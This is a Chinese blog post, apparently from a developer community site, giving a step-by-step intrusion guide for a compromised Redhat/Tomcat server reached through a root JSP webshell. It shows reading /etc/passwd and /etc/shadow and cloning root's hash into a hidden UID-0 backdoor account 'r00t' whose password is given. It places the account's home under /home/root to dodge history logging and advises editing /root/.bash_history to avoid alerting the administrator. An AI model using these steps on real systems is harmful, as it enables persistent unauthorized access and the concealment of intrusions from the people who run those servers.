本文介绍如何在Readhat+Tomcat+JSP+MYSQL5环境下,通过SSH登录并修改root账户的权限,包括修改密码、用户名及主目录路径,以避免历史记录泄露,提供了一种有效且隐蔽的远程访问方法。
对方环境:Readhat+Tomcat+JSP+MYSQL5
shell是root系统权限 也许有的同学问,都是root了还进一步~进到哪?
嗯~说下把,jsp的shell 我没见过能直接执行shell命令的.. 包括法克工具包里面的jsp shell 大多数都是改了下版权的一个jsFolder~~好吧 不吐槽了,在这种情况下呢,我们要远程登陆他的ssh 需要怎么做?
嗯 一般人都懂,直接编辑/etc/passwd和/etc/shadow呗~好吧
通过搜索 发现网上转来转去的并无效果,也就是通常说的无密码即可进入的添加账号~本人测试未果,也许人品?不管~进入backtrack5 直接
cat /etc/passwd
复制root那一行 然后继续
cat /etc/shadow
复制root那一行~~
获得
root:x:0:0:root:/root:/bin/bash
root:$6$TFlX/4Do$jU.K0t9TI1YteS73pW5LeQKuGCNSkg0QHonYsZtHCeRzUh4RxMFWEN/j/azrnGI1eJbdfpK1kZ1TNNIoL8AZ6.:15876:0:99999:7:::
这个就是root的密码了 为了不重复 我们改一些东西吧
root是用户 我们改为r00t /root是主目录 我们也要改 就该为/home/root吧~!为什么?因为如果是/root 你登陆后所操作的一切都会被记录到history中 有的同学问,直接history -c清除不就OK拉~我想说的是 这样的话很容易引起管理员发觉~~
如果这样不小心被记录了,请不要急着清除~进入到shell或者创建用户后 再次登陆然后编辑/root/.bash_history文件把自己操作的命令删除即可!
ok~改变后就是
r00t:x:0:0:root:/home/root:/bin/bash
r00t:$6$TFlX/4Do$jU.K0t9TI1YteS73pW5LeQKuGCNSkg0QHonYsZtHCeRzUh4RxMFWEN/j/azrnGI1eJbdfpK1kZ1TNNIoL8AZ6.:15876:0:99999:7:::
把第一行加入/etc/passwd 第二行加入/etc/shadow然后链接即可!
登陆账号:r00t 密码:toor
纯属科普 大大牛请无视~
扫一扫
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
